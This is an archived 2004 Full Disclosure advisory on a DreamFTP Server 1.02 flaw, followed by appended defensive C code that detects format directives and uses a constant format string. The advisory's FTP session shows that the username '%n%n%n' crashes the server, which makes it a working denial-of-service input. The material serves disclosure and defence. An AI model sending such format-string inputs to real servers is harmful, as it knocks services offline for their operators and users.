Full Disclosure mailing list archives
DreamFTP Server 1.02 Buffer Overflow
From: "badpack3t" <badpack3t () security-protocols com>
Date: Sat, 7 Feb 2004 00:29:54 -0500 (EST)
SP Research Labs Advisory x09
--------------------------------------------
DreamFTP 1.02 Buffer Overflow
--------------------------------------------

Vendor Home Page: http://www.bolintech.com/
Date Released - 2.6.2004

---------------------------------------------------
Product Description from the vendor:

Dream FTP Server provides powerful, multithreaded and robust FTP server
performance with a user-friendly and easy-of-use interfaces.

--------------------
Buffer Overflow

When connecting to the ftp server and supplying %n%n%n for the username,
the ftp server crashes.

Example:
---------
C:\>ftp 192.168.1.101
Connected to 192.168.1.101.
220- ****************************************
220-
220- Welcome to Dream FTP Server
220- Copyright 2002 - 2004
220- BolinTech Inc.
220-
220- ****************************************
220-
220
User (192.168.1.101:(none)): %n%n%n
Connection closed by remote host.

**Application Crashes**
----------

Exploit:
Not worth the time to debug and code an exploit.

--------------------------------------
Tested on WindowsXP SP1

Original Advisory:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1722

peace out,

------------------------------
badpack3t
www.security-protocols.com
------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
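An added example, not part of the original post and not DreamFTP code: `%n` is a printf conversion directive, so the code below assumes the username in the advisory reaches a printf-family call as the format argument (the post does not state the root cause). Under that assumption it shows the hardened call with a constant format string, plus a check a server or log filter can use to flag usernames that carry conversion directives; the function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Count printf-style conversion directives in untrusted input.
 * "%%" is a literal percent sign and is not counted. */
int count_format_directives(const char *s)
{
    int count = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;                                   /* step past '%' */
        if (*s == '%') { s++; continue; }      /* literal "%%" */
        s += strspn(s, "-+ #0123456789.*");    /* flags, width, precision */
        s += strspn(s, "hlLqjzt");             /* length modifiers */
        if (*s != '\0' && strchr("diouxXeEfFgGaAcspn", *s) != NULL)
            count++;
    }
    return count;
}

/* Hardened formatting: the format string is a constant and the
 * client-supplied name is passed only as data for %s.
 * The unsafe form would be: snprintf(out, outlen, user); */
int format_login_line(char *out, size_t outlen, const char *user)
{
    return snprintf(out, outlen, "USER attempt: %s", user);
}

int main(void)
{
    /* Constructed sample inputs; the first is the username from the advisory. */
    const char *samples[] = { "%n%n%n", "anonymous", "100%%" };
    char line[128];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        format_login_line(line, sizeof line, samples[i]);
        printf("%-28s directives=%d\n", line, count_format_directives(samples[i]));
    }
    return 0;
}
```

Building with `-Wformat -Wformat-security` (GCC/Clang) makes the compiler warn about the unsafe form, where a non-literal string is passed as the format with no arguments.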